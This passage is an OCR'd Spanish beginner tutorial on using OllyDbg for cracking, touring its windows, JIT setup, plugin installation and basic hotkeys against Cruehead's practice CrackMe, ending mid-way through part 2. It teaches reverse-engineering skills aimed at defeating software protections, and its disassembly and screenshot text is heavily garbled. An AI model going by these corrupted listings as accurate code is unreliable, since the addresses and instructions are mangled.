As 7C204008_— [MOU DWORD 'C1,El 


. 0765 Saz04090|MOU DWORD PTE 
C705 £4204009|MOU DWORD PTR 
+ C705 98204000: 


DWORD PTR 4 
+. 68 64204000 H CRACKME. 09492064 
. ES E LL e SUSER32.RegisterClassA> 
: FF35 CA204000 DWORD PTR DS: [4020CA] 
sA aa Ha 


= NULL 
= 8000 (32768.) 


ON 
3 


en E] 
besooosa Pl 2090 
pas0009a qe 


A sE 
B4000090 0B4 
BOBaACFOD 6CFaB0a JVERLAPPED: oa AIEEROn WS_MAXIMIZEBOX WS_5 
CRACKME. 004020E7 "CrackMe vl 
A Se E Ba4u2aFs lo, seed to di lean the codet” 
ccozanaa ALL Some. SUSER32. sas indowExA> CreatellindowExA 
04204000 00 pá PTR D: 420047, ERX 


3 
A 61 


7 SW_SHOWNORMAL 


Allí esta el listado inicial del crackme de CRUEHEAD analizado, y si arranca sin analizar debajo 
podemos ver la diferencia. 


6A Ba PUSH O 
ES FFo40000 CALL _<JMP. £KERNEL32. GetModu leHandleA> 
ES paentana po [qua PTR DS: [4820CA],EAX 


ma 


68 F4204009 PUSH ERACKME. BB4B29F4 ASCII "No need to disasm the codet” 
ES A6040000 CALL _<JMP. 8 USER32.FindllindowA> 
Beca OR EAX, ERX 

ME Bl REN SHORT CRACKME. 00491010 


C705 64204900 a: ¿50 'oworo PTR DS: [402064], 4003 

C705 68204008 2: MOU DWORD PTR DS:L4: ci CRACKME. lndPr: 
C705 6C204900 al Mi a 86C1,8 

C7as 70204000 61 MOU DWORD PTR DS:[4020701,0 

Al Cazoq900 MOU El WORD PTR 


10U EAX, DI TR DS: [4020CA] 
AS 74204000 MOU DWORD PTR DS: [402074],EAX 
6A 64 PUSH 64 
58 PUSH EAX 
ES Di030000 CALL _<JMP.£USER32.LoadIconA> 


AS 78204000 MOU DWORD PTR DS: [402078],EAX 
68 607F0000 PUSH 7F00 


SA PUSH U 

Es A2030000 CALL _<JMP.£USER32.LoadCursorA> 

MOU DWORD ER DS: dba. Ea 
'TR DS: [402080] 


C7es soz040900 01 MOU DWORD P- 

Cres s4204900 no nal ES DS: [402084], ERACKNE. 08492 ASCII MENU” 

Cres sa204000 F: MOU DINO! 'R_DS: [492088], CRACKME . Desda ASH "No need to disasm the codet” 
68 64204009 PUSH CRACKIE 1u4BD2064 

Es F3030000 CALL <JMP.SUSER32.RegisterClassA> 

6A 00 PUSH M 

FF35 CA204009 |PUSH DWORD PTR DS: [4020CA] 

éA 08 Push 8 


A 08 1] 
68 00SBuBaa PUSH 8000 
68 BESBLBDO PUSH 8000 
A 6E 6E 


68 B4000000 PUSH 0B4 
68 BOBACFOD PUSH 6CFOB0a 
68 E7204009 PUSH CRACKME. 804920E7 ASCII "CrackMe v1.0” 


El sendos pus ia 0a4020F4 ASCII "No need to disasm the codet” 

Es CCosoa0a L_<JMP.£USER32. CreatellindowExA> 

A3 a4204000 ñ00 DWORD PTR DS: [492004], EAX 

sA 61 PUSH 1 Y 


La ventana analizada muestra mas información, que aunque aun no sepamos bien que es, se ve 
mas completa, igual es bueno saber que de la ventana analizada se puede quitar el análisis, si uno 
no esta de acuerdo con el mismo o uno se da cuenta que el mismo esta equivocado lo cual puede 
ocurrir. 


Muchas veces el OLLYDBG muestra partes que no son listado correcto porque interpreto mal el 
código ejecutable como datos, en ese caso se ven unos DB como estos 


OllyDbg - kill-me3.exe - [CPU - main thread, module 


[c] File View Debug Plugins Options Window Help 


EEES EL EE] +u 1) +) 1/elmT)wn/c),]x/B] 


CHAR *f” 


CHAR *r” 
CHAR *f” 
sp 

EE 660€: SFSF660F Far jump 


L 
. 5 OF665FSF Ol 


CHAR *f” 


CHAR *f” 
CHAR *r” 


En ese caso puedo quitar manualmente el análisis que el OLLYDBG ha realizado haciendo CLICK 
DERECHO en el listado y eligiendo ANALISIS-REMOVE ANALYSIS FROM MODULE 


View » 
Copy to executable » 


Analyse code 


Bookmark » 


Scan object files 
Appearance La Remove object scan from module 


y en ese caso el listado se vera sin análisis pero correcto 


0) PJ] EE] AJO ES REA RJ ADO HE AA OS IS IA O IS ID IR IR E 


66:2E:6B10 66 IMUL_DX, WORD PTR CS: [EAXJ1,66 
CD 72 INT 72 
1066 40 ADC BYTE PTR DS: [ESI+4C],AH 
EA OF665FSF DEG1 JMP FAR 660E: SFSF66BF Far jump 
D PRO, Unknown command 
BD BES6ASBD OR EAX, BDAS660E 
, 
A2 7210663A MOU BYTE PTR DS: [3661072], AL 
FR 22? Unknown command 
BE PUSH CS 
66:64:20 9D SUB AL,9D Superf luous prefix 
66:3B9A BD66C1FI CMP BX,WORD PTR DS: CEDX+FDC1669DJ 
BE PUSH CS 
66:R6 CMPS BYTE PTR DS: [ESI1,BYTE PTR ES: [EDI 
3E:BE PUSH CS Superf luous pref ix 
66:DS5 ES AAD_BES 
BC 66 OR AL,66 
SA POP EDX 
C2 BC66 RETN 6600 
EC IN AL, DX 1-0 command 
9c PUSHFD 
OD 66EEFGDE OR EAX, BEFSEE66 
66:BD_3FGE OR AX, BESF 


66:699A BD66F3C) IMUL BX, WORD PTR DS: [EDX+C5F3660D],660D 


Otra cosita que hace a la claridad para trabajar y que por lo menos a mi me gusta, aunque cada 
uno puede variar en estos temas es colorizar los JUMPS Y CALLS eso se hace haciendo clic 
derecho APPEARENCE — HIGHLIGHTING — JUMPS AND CALLS 


Go to » 


Follow in Dump » 
—— View call tree Ctrk AE 
Search for » 
Find references to » 
View » 
Copy to executable » 
Analysis » SERA 
Bookmark » 
Always on top 
Show bar 
Show horizontal scroll 
Default colurmns 


Font (this) » | y No highlighting 
Colors (this) » | Christmas tree 


Font (al » E 
Colors (all) »|  Hilite 3 


Ho 


El resultado es el siguiente 


[€] File View Debug Plugins Options Window Help 


Bet Moda LoHand LeA 


MOU DWORD PTR DS: [4020CA],EAX 


PUSH A E E L NULL 
. 68 F4204000 |PUSH CRACKME. 004020F4 "No need to disasm the coc 
ES 6040008 Finalindowa 
ca OR EAX,EAX 


BB 
eS el ¿E tORT CracknE.00401010 
> C705 64204009) MOU DWORD PTR DS: [402064], 4003 
C705 68204000| MOU DWORD PTR DS: [402068], CRACKME. ln Pr 
. C705 6C204008| MOU DWORD PTR DS: [40206CJ,0 
C705 702040909) MOU DWORD PTR DS: [402070],8 
. Al CA204000  |MOU EAX,DWORD PTR DS: [4026CA] 
As gqenoaa MOU DWORD PTR DS: [402074],EAX 


- 6 PUSH 64 Rsrolane = 198. 

. 50 PUSH EAX (fis: Ñul 

+ ES DiG30000 | CALL <IMP-RUSERS2.Losdicona) LoadiconA 

- AS 78204000 [MOU DWORD PTR DS: [402078], EAX 
68 007FoBaa [PUSH 7FOB lame = TDC_ARROW 
SA PUSH A [ NULL 
Es Azasanaa | CALL <IMP-RUSERS2:LosdCursorAs LoadCursorÁ 


. AS 70204000 [MOU DWORD PTR DS:[40207C],EAX 
c7es saze4aga| MOV DWORD PTR DS: [492088],5 

. C7OS 24204000) MOU DWORD PTR DS:[402084],CRACKME.B0402| ASCII MENU” 

+ C765 88204008| MOU DWORD PTR DS:[4902088],CRACKME. 604821 ASCII "No need to disasm the codet 
. 68 64204000 |PUSH CRACKME. 00402064 CRACKME. 00402064 
+ ES F3030000 ER Ica erClassA 

. 6A 00 NULL 
+ FF35 CA204009' pu gueno PTR DS: [4026CA] 


. 60 00 
22 a9NsÓRaaR | PISh Sana 


Allí vemos que en celeste quedan resaltados los CALLS y en amarillo los JUMPS, lo cual es mas 
claro para la vista. 


Bueno con eso nuestro listado queda mas fácil de interpretar, aunque aun no tengamos la mas 
remota idea de que significa, pero bueno hay que preparar antes las herramientas para poder ir de 
a poco aprendiendo 


2) REGISTROS 


La segunda ventana importante del OLLYDBG es la de los REGISTROS 


00125FES 
7CHIEBÍS 


DOLZrFOS 
dada HH 
00401008 CAC» " 


ó ds REGISTROS 
MEE l € ES 


ERROR_M00_MOT_FOWNO. (0900907E) 
246 


Recordamos que la ventana de registros se encuentra en la parte superior derecha del OLLYDBG, 
allí muestra bastante mas información que los registros en si. 


apa 


[l.KiFastSystenmCal lRet 


REGISTROS 


CKME. <Modu leEntryPoint 


it DUFFEFFFFF) 
it OUFFFFFFFF) 


FLAGS 


it OLFFFFFFFF) 
it ?FFDFOOOFFF) 
L 


rr ERROR_MOD_NOT. FOUND (00900997E) 
E onanazas (NO,NB,E,BE 


Na danonanocancaacado 
p e = 


EST 4929 Cond 1686 
FCW 027F Prec NEAR,S 


rr 6o1BDóDo (EQ) 
3 1 1,174. 11 


Tiene muchísima más información que aun no veremos, pero se puede cambiar el modo de 
visualización en tres formas. (VIEW FPU REGISTERS, VIEW 3D NOW REGISTERS y VIEW 
DEBUG REGISTERS) por default viene elegida la primera. 


Í CS 0018 32bit O(FFFFEFFF) 

¿| Copy all registers to clipboard 

| View FPU registers 

a de 


View 3DNow! registers 
19) View debug registers 


Appearance 


bb bbbb ba pub 


1 
ME Oralaía CACAACA CACACALA CALALALA 


Por ahora no ahondaremos mucho en eso ya que nos preocuparemos más que nada en el tema 
REGISTROS y FLAGS, lo menciono para que sepan que hay varias vistas en el registro. 


3)STACK O PILA: 


Bueno allí vemos el llamado STACK O PILA aquí no hay mucha configuración posible solo la 
opción de mostrar la información relativa al registro ESP o al registro EBP. 


/ € STACK o PILA ) 


Y 


p< 


Por default y lo que mas se utiliza es la vista relativa a ESP, pero para cambiar a la vista según EBP, haciendo 
clic derecho en el stack eligiendo GO TO EBP cambiamos y para volver GO TO ESP volvemos a la opción 
por default. 


7CS16D4F] RETURN_t: ; p 
70920788 ntdll.70' Copy to clipboard Cte 
FFbOOa Modi 
e Pl 
a o ES 
nd o 
a ant o oono, 
erne 
20009909 Pop DWORD 
00009000 
D0009999 Search for address 
00401000| CRACKME.: i : 
pOBBBABA Search for binary string Ctrl+B 
Go to expression emi 
Follow in Disassembler Enter 


En sucesivas entregas explicaremos bien el funcionamiento del stack por ahora miramos como se puede variar 
su configuración solamente. 


4) DUMP: 


La ventana del DUMP tiene muchas opciones de visualización, por DEFAULT nos muestra la visualización 
HEXADECIMAL de 8 columnas o bytes, la cual puede ser modificada haciendo CLICK DERECHO en el 
DUMP y eligiendo la opción deseada. 


La opción por DEFAULT es la que generalmente mas se usa, aunque tenemos opciones para cambiar para 
mostrar desensamblado (DISASSEMBLE), Texto (TEXT) y diversos formatos (SHORT, LONG, FLOAT) 


bo 60 Ba Bu Bu Ba 
bo 60 Ba Bu Bu Ba 
89 69 89.8 Back 

» 
BO BO Ba BE Backup 


DB 00 Ba 06 
00000006 S3earchfor  » 


99 99 99 0 Go to » 


HexUNICODE ( Do bytes) 
HexUNICODE (8 bytes) 


» 


DG 06 00 26 Disassemble 
68 20 6D 6 Special » 


Y además la opción SPECIAL — PE HEADER que mas adelante en próximos capítulos veremos para que 
sirve esto que es muy útil. 


10 00 LIsasserrble. fp 


a 
310 00 Appearance >» 


Ya conocemos las partes que se ven en la ventana principal del OLLYDBG, aunque también hay más 
ventanas que no se ven directamente, se puede acceder a ellas, tanto por el menú, como por los botones de las 
vistas. 


pModule = MULL 


GetModuleHandleA> |LGetiodu leHandleA 
20CA],EAX 


Veremos que es cada uno 


El botón L o VIEW-LOG nos muestra lo que el OLLYDBG escribe en la ventana del LOG lo cual puede ser 
configurado para mostrar diferentes tipos de información, por default en la ventana del LOG va guardando allí 
información sobre el arranque, y de la información escrita en el mismo por los diferentes BREAKPOINTS 
CONDICIONAL LOGS, lo cual se vera mas adelante, por ahora vemos allí la información del proceso que 
arranco, en este caso el crackme de cruehead, las dll que cargo, y ciertos tips sobre el análisis. 


File "CiNDocuments A Settin Eb i ONES itoriovB1-CrackmenCRACKME. EXE” 


ted 
Module C:Documents Sett i0pEnk cardosEsor itoriovB1-CraokmeCRACKME. EXE 
Modu E Ci WINDOWS sy: = ENE DLL 
Module C: WINDOWS +system32xCOMDLG32. 011 


g ELL: 
Module C:SARCHIV” 156009 CESOODSLE óbEns2" 1.DLL 
Module C: WINDOWS system32 115232. d1 1 
Un load C:SARCHIV” 156009 a o 1.DLL 
Un load C: WINDOWS 3system32u152_32. 
Program entry point 
Analysing CRACKME 


2609. 2180_+-w4w_a84f 1ff 9 oomot 132. d1 1 
e DAN rn 07 


Una de las opciones mas importantes de esta ventana es la de loguear a una fila, para ciertos casos que 
deseemos guardar la información en una fila de texto, en ese caso CLICK DERECHO-LOG TO FILE. 


Dump at address 
Dump in CPU 
Clear window 


Copy to clipboard» 
Appearance » 


El botón E o VIEW-EXECUTABLES nos muestra la listado de los ejecutables que utiliza el programa, exe, 
dlls, ocxs, etc 


PE] File View Debug Plugins Options Window Help 


CERCO A Apenmialecelrla!s! EN! 


Aquí también el botón derecho tiene muchas opciones que por ahora no veremos ya que estamos mirando en 
forma general al OLLYDBG. 


El botón M o VIEW — MEMORY, nos muestra la memoria ocupada por nuestro programa, allí se ven las 
secciones del ejecutable, dlls que utiliza el proceso, así como el stack y diversas secciones allocadas por el 
sistema, y muchas veces al correr los programas, los mismos realizan nuevas allocaciones de memoria. En 
tiempo de ejecución. 


File View Debug Plugins 


[«4x] >uj »+ 


Options Window Help 


E + 1]e9m]1/w)1/c///8]8/R]--J5] ¿5352 


Address [Size Duner [Seotion [Contains  |Tupelñcoess | Initial[Mapped as 
10810098, BOBa1000 Priv] RU En | 
00920099 00901090 Priv Ri E) 
0612C000 60001098 Priv|RU- Gua; Ru 
Bal20000 paBasada stack of nalPriv|Ri Guai RU 
B6130008 aoBe3ada Hao |R R 
pa9uE00d Priv Ru Ru 
¡9099 | BOBASADa Priv RU RU 
B0250899 BABaSa00 Map [RU Ru 
BOZ60098 BAB1600a Map |R R “DevicesHarddiskUo lune1 WINDOWS sy sten32uun icode.n Ls 
BO289008 BAB3DADO Map |R R “Dev ¡cerHarddiskUo lume1 WINDOWS sy sten32r Locale.n ls 
BG2C004a| DOB4 1090 Map [E R Device HarddiskUo Lune 1 WINDOWS*sy stend2ssortkes.n Ls 
96310009 BaVasaYa Map |R R WMeviceHarddiskUo lume1WINDOWSASystens2rsorttbls.n ls 
'20800| 00041008 R R 
BO370099 BOBO1Al lvl Ru Ru 
BO380000 00081090 Priv Ru Rul 
13090 BOBO4ADO Priv Ri Ru 
0630009 BaBaJaYa Priv Ru Ru 
'BO800| BUBI008 R R MeviceHarddiskUo Lune 1 WINDOWSAsystemiZrotype.n Ls 
BESCOBas| BaBazada Map |R E 
20092008 Map |R R 
9991999| CRACKME [PE header | Imag|[R RUE 
Bo4a1009 BaB01090| CRACKME | CODE code Imag|R RUE 
1001090 CRACKNE | DATA data Imag|R RUE 
Bagos00s B00E1ada| CRACI idata |i a Imag|R RUE 
B0404009 00901090 CRACKMME |.edata |e A RUE 
Bo4usB0s BuAB1OUa CRACKME |.reloc |relocations| Imag|R RUE 
Badasaaa BaDaZ0aa CRACKME |.rsro [resources |Imag|R RUE 
Ba410000 BABOEADA Map [RE RE 
Ba4DaBeS BaBEZA: Map [RE RE 
0088 | 60103090 PR E 
geerooa ge1ndosa Map [RE RE 
dOSFOD0S| 8n0: Priv Ru ful 
Sscabeoo| aseo Loa CONCTL32! [PE header |Inag[R RUE 
SSca1800| e8878908 | COMETLSS| .veut [codes inporti Inag|E RUE 
Seca1oo9 BeDesasa CONCILSZ «data [data Imag|R RUE 
Sschdose aso1rose COMCTLSS :rere  [recouroes |InagiR RUE 
1904098| COMCTLSZ| reloc |relocations|Imag|R RUE 
76360099 BOBa1ada| COMDLG32. PE header | Imas|[R RUE 
7éz61008 bassa008 COMDLE32| .text — | code, import| Imag|R RUE 
76291009 deBagaua COMDLGS2 -data [data Imag|R RUE 
76395008 60012008 COMDLGS2| .rsrc [resources |Imag|R RUE 
ze ¡3al IMOLG32| .reloc |relocations| Imag|R RUE 
77340008 BOBa1098| conct 1_1 [PE header | Imas[R RUE 
77301999| eseanos| conotl-1|.seut  [code, inporei Inas|R RUE 
77431009 00B01099 comct l-1| «data | Imag|R RUE 
77432008 08064998 conct 1] .rsro E Imag|R RUE 
72420088 | eaaosada| comcr 1] -reloc [sslscaei ións| Ina £ RUE 
778E0608 00001000 ¡PE header |Imas[R RUE 
?7BE1000 eenácoDo|mavort | .text | gede, importi Inag|R RUE | 
77C20008| 08Ba7000| msvcrt |.data  |dat Ima! R RUE 


Haciendo clic derecho podemos hacer SEARCH en la memoria para buscar en ella, strings, cadenas hexa, 
unicode etc, además nos da la posibilidad de colocar diferentes tipos de breakpoints en la secciones, como asi 
también la posibilidad de cambiar el acceso a las mismas con SET ACCESS ya profundizaremos en esto. 


El botón T o VIEW-THREADS nos da el listado de los THREADS del programa 


A O 


A —— SS ERROR_MOD_NOT_ A 


Aunque no sabemos aun que es esto y la explicación llegara en los próximos capítulos es bueno ir 
familiarizándose en donde esta cada cosa, luego aprenderemos que es y como se usan mas adelante. 


El botón W o VIEW-WINDOWS nos muestra las ventanas del programa, como aun no corrió, no hay 
ventanas así que esta vacía. 


Windows 
Title 


El botón H o VIEW-HANDLES, nos muestra los handles por ahora localícenlo, ya explicaremos que es y 
para que sirve 


A A 


Handles 


PODOBOZA Desktop CAN Def au lt 
B0B09009S | Directory 4. | OOBBBGOS SKnownDl ls 
60000614 Directory é p sblindows 
56009000309 Directory 5 sBaseNamedObjects 
BO00BAB1C| Event 3. 


DOBBBBBC File (dir) coc: MDocuments and Settings*Ricardo“EscritoriowWB1-C: 

DOBOBO3C | File (dir) Cc: WINDOWS >WinS:S5486_Microsoft.Windows. Common—Cor 
Key 2. HKEY_LOCAL_MACHINE 

ns «(Dl sKernelObjectsCritSec0utOfMemoryEvent 

'ort 


B6094B10| Section . 

B00900034 | Semaphore . |[DO1FODOS Count 6. of Waserl oedobjecte she! 1A48F1A32-A340-11D1-BC6B-1 
B09098020 | WindowStat ¡on . | OOBFO37TFE MiindoW3sWindowStat ionsvWinStaB 

B09000023 | WindowStat ¡on . | BDBFO37F MiindowsWindowStat ions*inStaB Y 


El botón C o VIEW-CPU nos retorna a la ventana principal del programa. 


El botón / o VIEW-PATCHES nos muestra los parches si el programa ha sido modificado, por ahora esta 
vacío al estar sin cambios 


Ex) 


El botón K o VIEW-CALL STACK nos muestra el call stack, que es el listado de los calls que entramos, 
hasta el punto donde el programa esta detenido. 


OllyDbg - CRACKME.EXE - [Call stack of main thread] 


[x] File View Debug Plugins Options Window Help 
ada Pu lá HE al 1/2)m/1/w]5/c/7/x/8]R]-/s] ¿E 


BO12FFC4 ia £D4 


El botón B o VIEW-BREAKPOINTS es el listado de los breakpoints comunes colocados en el programa, no 
muestra los hardware breakpoint ni los memory breakpoints aquí, solo los BP comunes. 


Breakpoints 


El botón R o VIEW- REFERENCES nos muestra la ventana de referencias la cual nos da los resultados de 
cuando hacemos una búsqueda de referencias en el OLLY 


References 


El botón ... o VIEW-RUN TRACE, nos muestra el listado si hemos hecho algún RUN TRACE en nuestra 
maquina, y tiene también la posibilidad de elegir LOG TO FILE, para guardar el resultado del traceo en un 
archivo txt 


Run trace 
¡Back [Thread |Module |Address |c: 


Bueno hasta aquí un paneo a vuelo de pájaro por los botones mas importantes, no detallamos explicación 
porque aun hay que aprender antes algo de ASM, y practicando el uso del OLLYDBG podremos ir aclarando 
mas profundamente para que sirve cada botón y cada OPCION, la idea es irse familiarizándose con donde 
están las cosas que veremos en las próximas entregas. 


COMO CONFIGURAR EL OLLYDBG COMO JIT (JUST IN TIME DEBUGGER) 


Aclaro que no conviene tener configurado el OLLYDBG constantemente COMO JIT, solo conviene hacerlo 
en Ocasiones especiales, ya que al estar como JIT capturara el error de cualquier programa de nuestra maquina 
y arrancara solo, lo cual puede resultar molesto si no estamos debuggeando o crackeando, por lo tanto les 
enseño como se configura para casos especiales, pero conviene dejarlo con la opción que trae por default que 
no esta como JIT. 


Para colocar el OLLYDBG como JIT vamos a OPTIONS-JUST IN TIME DEBUGGING 


igins ES Window Help 
El appearance 


0574] i i 
erteñ  Debugging options Alto 


US 5 Just-in-time debugging » 
Abni Add to Explorer 


Y aprieto el botón MAKE OLLYDBG JUST IN TIME DEBUGGER y DONE 


Just-in-time debugging 


Current settings: 


- JIT debugger is drwwtsn32 
- Debugger altaches without confirmation 


Make OllyDbg just-in-time debugger 


Current settings: 


- OllpDbg is aJIT debugger 
- Debugger attaches without confirmation 


Restore old just-in-time debugger 
Contirm before attaching 


Agregando PLUGINS al OLLYDBG 


El OLLYDBG trae la opción para agregar plugins que nos son necesarios para realizar cierta tarea, por ahora 
solo agregaremos el plugin COMMAND BAR para aprender como se agregan los mismos. 


Bajamos el plugin COMMAND BAR el cual puede ser bajado de AQUÍ y la mayoría de los plugins se hallan 
AQUI 


Allí esta bajado en mi escritorio el plugin lo descomprimo con WINZIP entro a la carpeta que descomprimí a 
ver el contenido 


id Settings tRicardo'Escritorioyg_cmdbar300108 


HE 


CmdBar.ini 
Opciones de configuración 
1KB 


macro.def 
Archivo DEF 
1KB 


readme_e,txt 
Documento de texto 
2 KB 


readme_j.txt 
Documento de texto 
2KB 


src300108.zip 
18 KB 


Q Mm ua mu y [$ 


Ahora antes que nada crearemos una carpeta para los PLUGINS en nuestra maquina, yo la creare en C:/ y la 
llamare PLUGINS nada mas. 


Voy aC y creo una NUEVA CARPETA 


e) odbg110 


Allí esta, puede estar ubicada en cualquier lugar, pero a mi me gusta tener todo en C por eso la coloque allí, 
de cualquier forma debemos configurar el OLLYDBG para que reconozca esta carpeta como la que tendrá los 
Plugins. 


Para ello en el OLLYDBG vamos a OPTIONS-APPEARANCE 


OllyDbg - CRACKME.EXE - [CPU - main thread, 
[| File View Debug Plugins Aja jes Window Help 


+ E E 
Debugging opti AIt+O EE 


HOY DU Justrin-time debugaina 


Y en la ventana que se abre vamos a la pestaña DIRECTORIES 


Fl Appearance [Xx] 


General | Defaults | Dialogs Directories | Fonts | Colours | Code highlighting | 


UDD path: 
C:todbg110 Browse 
[Y Backup old .udd files 
Plugin path: 
C:todbg110 1 Browse 


“zz Undo | Cancel | 
¡q A 6 neo 


Vemos que en donde apunta al path de los plugins (PLUGIN PATH), en realidad nos esta apuntando a la 
carpeta donde esta el OLLYDBG.exe y podría dejarlo allí, pero a mi me gusta tener los plugins separados por 
lo tanto en donde dice PLUGIN PATH- BROWSE busco la carpeta que cree para mis plugins. 


elal | Uetaults | Uialogs Pieces | Fonts | Lolours | Lode highnghtng | 


Buscar carpeta 
Select path to OllyDbg plugins 

Plugin 

PLUGINS 


9 (E) Multimedia Files 

(E) NFRoot 

(5 odbg110 

(5 odbg110 FINAL 

(5) OmniPageSearchIndexer 
Ge (y PAPRPORT 

(E pofrd 


SA 


Cancelar 


Allí elegí la carpeta PLUGINS que cree y sale este aviso 


Plugin path changed [Xx] 


A You have changed plugin path. To activate this option, you must restart OllyDbg. 


O sea que debo reiniciar el OLLY para que me reconozca la nueva carpeta de plugins, pero antes copio el 
contenido que baje del comand bar a mi carpeta de plugins. 


Q Atrá 3) y yo) Búsqueda l/s Carpetas Edy 


Dirección [E C:NDocuments and SettingsiRicardoWEscritoriolg_cmdbar300108 


Abrir 
Abrir con Ulead Photo 
Explorar 
EB add to archive... 

E add to "g_crmadbar300 


Otros sitios 


(8 Escritorio 
(E Mis documentos 

(1 Documentos compartidos 
Y mec 

Wu mis sitios de red 


EB Compress to "g_cmde 


0) copyToDWD 
el CopyToDYD Depot 


¿Unlocker 


Í3 WinUHA: Add To Arcr 
3 WInUHA: Add To Arck 
Í3 WinUHA: Add and Ser 
Í3 WinUHA: Add To "g_c 
(Winzip 

Scan with Zone Labs 
Abrir con 

Vestudio 

UltraEdit-32 

E-mail with Yahoo! 


Detalles 
6 elementos seleccionados. 


Tamaño total de archivo: 82,7 KB 


Enviar a 


Allí copie todo el contenido y lo pego en mi carpeta PLUGINS 


Archivo Edición Ver Favoritos Herramientas Ayuda 


Q avás S Q y ¿2 Búsqueda (Es Carpetas Ey 


Dirección |) C:PLUGINS 


Tareas de archivo y carpeta Y 


Otros sitios 
es Disco local (C:) | CmdBar.dll 


(ES Mis documentos 


(E) Documentos compartidos E CmdBar. ini ] 
9 mec = Opciones de configur: 

e 1KB 
€ Mis sitios de red 

» macro,def 

=| Archivo DEF 
Detalles a 1KB 
PLUGINS S readme_e.bt 
Carpeta de archivos ==| Documento de texto 
Fecha de modificación: lunes, 07 de = 2KB 
noviembre de 2005, 10:07 ] 

E readme_j.txt 

==| Documento de texto 

> 2 KB 


Allí esta el contenido del plugin Command Bar en la carpeta PLUGINS, cada plugin que baje y agregue solo 
deberé copiar su contenido allí, muchas veces con copiar solo la dll es suficiente. 


Ahorra cierro el OLLYDBG si lo tenia aun abierto y lo reinicio. 
Vemos que en el menú PLUGINS me apareció el COMMAND BAR y las opciones del mismo. 


Cñoose Bar font 


Help 


CommandBar v3.00,108 


A su vez en la parte inferior del OLLYDBG vemos la COMMAND BAR instalada 


Command y] | o PS 
OllpDbg v1.10 


Es una barra para tipear comandos que nos facilitara mucho las cosas, mas adelante veremos su uso, por ahora 
lo importante es saber agregar plugins. 


Para quitar cualquier PLUGIN con solo quitar la dll correspondiente de nuestra carpeta PLUGINS y reiniciar 
el OLLYDBG, desaparecerá, les aconsejo que dejen siempre activa la COMMAND BAR. 


Arranco nuevamente el crackme de CRUEHEAD EN OLLYDBG 

Las teclas mas usadas en el OLLYDBG son: 

F7: Ejecuta una sola línea de código (si estas en un CALL entra al mismo a ejecutarlo por dentro) 

F8: Ejecuta una sola línea de código (si estas en un CALL no entra al mismo lo ejecuta completo sin entrar y 


sigue en la siguiente línea luego del CALL) 


Esos dos formas de tracear manualmente son verdaderamente diferentes y según cada caso usaremos F7 o F8 
lo cual veremos más adelante. 


F2: Coloca un Breakpoint COMUN en la línea que marcas con el Mouse o esta grisada en el listado, para 
quitar el BP apretas nuevamente F2. 


Por ejemplo: 


[c] File View Debug Plugins Options Window Help 


EEES ERE Era PITA PL EF Ra 


36 PUSH Y (eno 
3 ES Progagos a E Serhada LeHandlen 
3 CA2o4000 [MOV DIWORÉS PTR DS: [4920CA],EAX 


E [55] pl le NULL 
S F4204000 PUSH ERACKNE. BO4B20F4 "No need to disasm the codet” 
. ES A6040006 FindilindowA 
BECO OR EAX,EAX 
v74 01 
1c c3 


00491010 5 C7os 64204000| MOU DWORD PTR DS: [482064], 4083 
ARÁA1A? PAR ESPALAAA! MAI MNR PTR MS-Tár?arRS1 PROPKME hlndAPr: 


Quiero poner un BP en 40101A pues marco con el Mouse esa linea 


[c] File View Debug Plugins Spice Window Help 


EEE 21 vil 


5 698 QM 
. ES rogooDo 
. AS CA204000 — [MOU DWORD PTR DS: [40206CA],ERXx 
. 6A 06 pl e NULL 
. 68 F4204000 [PUSH CRACKME. 004020F4 Cla "No need to disasm the codet 
. ES AG6040600_ | CALL <JMP.SUSERS2.FindilindowA> i dowA 
. BBCO OR EAX, EAX 
.v74 01 
5 C7os 64204000| MOU DWORD PTR DS: EA 4003 
. 0705 £C204000 mou DWORD P PTR Ds: Eá02080] B 


ear Sana 


Al hacer clic una sola vez se marca y queda grisada como vemos en la imagen, luego apreto F2. 


O 


| 4 x] ET CAE il HEM El?) 


90491009 pModu le = NULL 
00 . ÉS Frogaago CALL <4MP.eKERNELS2. GetModu LeHandLeñ> GetModu leHandleA 
. AS CA2040060-— [MOU DWORD PTR DS: [4026CA],EAX 
. 6A BB PUSH O e le = NULL 
. 68 F4204009 [PUSH CRACKME. 0049020F4 ass = "No need to disasm the codet” 
. , ms CALL _<JMP. 2 USER32.FindllindowA> FindiindowA 


OR EAX, EAX 


PRL PASEAR) MAL MUNDN DTD MS.TAMDA7AT ía 


Vemos que se pinta de rojo la zona de la dirección, eso significa que hay activo un BP o Breakpoint allí, si 
apreto F2 nuevamente se quita. 


F9: Para Correr el programa es similar a RUN, con esto el programa correrá, hasta que encuentre algún 


BREAKPOINT, o alguna EXCEPCION que lo detenga o FINALICE por algún motivo, al apretar RUN 
veremos en la esquina inferior del OLLYDBG la palabra RUNNING o sea que esta CORRIENDO. 


v v 


( Ea] 


Allí arranco el CRACKME DE CRUEHEAD, lo podemos ver correr 


CrackMe v1.0 Ex] 


File Help o 


Si PAUSO la ejecución en OLLYDBG apretando F12 o DEBUG -PAUSE 


cercrr ena Or >rem cnaln 
SE handler 


[—— [Paused 


Vemos que el OLLYDBG cambia a mostrar PAUSED o sea que esta PAUSADO, podemos volver a hacerlo 
correr con F9 o DEBUG-RUN. 


Para cerrar el programa que esta siendo DEBUGGEADO apreto DEBUG-CLOSE 


Bueno esto a sido una mirada a vuelo de pájaro del OLLYDBG la cual profundizaremos mas adelante pues 
tiene muchísimas opciones y configuraciones las cuales seguiremos estudiando en las próximas entregas, es 
muy útil que bajen el programa lo configuren y miren donde están las cosas que muestra este tute, así como le 
agreguen el plugin para practicar, y hagan correr y pausar el CRACKME DE CRUEHEAD, prueben ponerle 
un Breakpoint y practiquen esas cosas para que en la segunda entrega estén mas familiarizados con el mismo 
y podamos avanzar lento pero seguro, y sin dudas. 


Un abrazo a todos los CRACKSLATINOS 
Hasta la parte 2 

Ricardo Narvaja 

07 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 2 


Luego de haber visto a grandes trazos, la ubicación y las principales partes del OLLYDBG, debemos 
aprender el sistema de numeración utilizado y cual es el concepto de stack aunque sea para tener una idea, 
luego profundizaremos. 

SISTEMAS NUMERICOS 

Los tres sistemas numéricos que más se utilizan son el binario el decimal y el hexadecimal. 

El concepto básico que deben tener de ellos es el siguiente: 

BINARIO: Se representa los números con dos caracteres el 0 y 1 por eso se llama BINARIO. 


DECIMAL: Se representa todos los números con 10 caracteres (del O al 9) por eso se llama decimal. 


HEXADECIMAL : Se representa todos los números con caracteres del 0 al F ( del O al 9, mas A, B, C, D, 
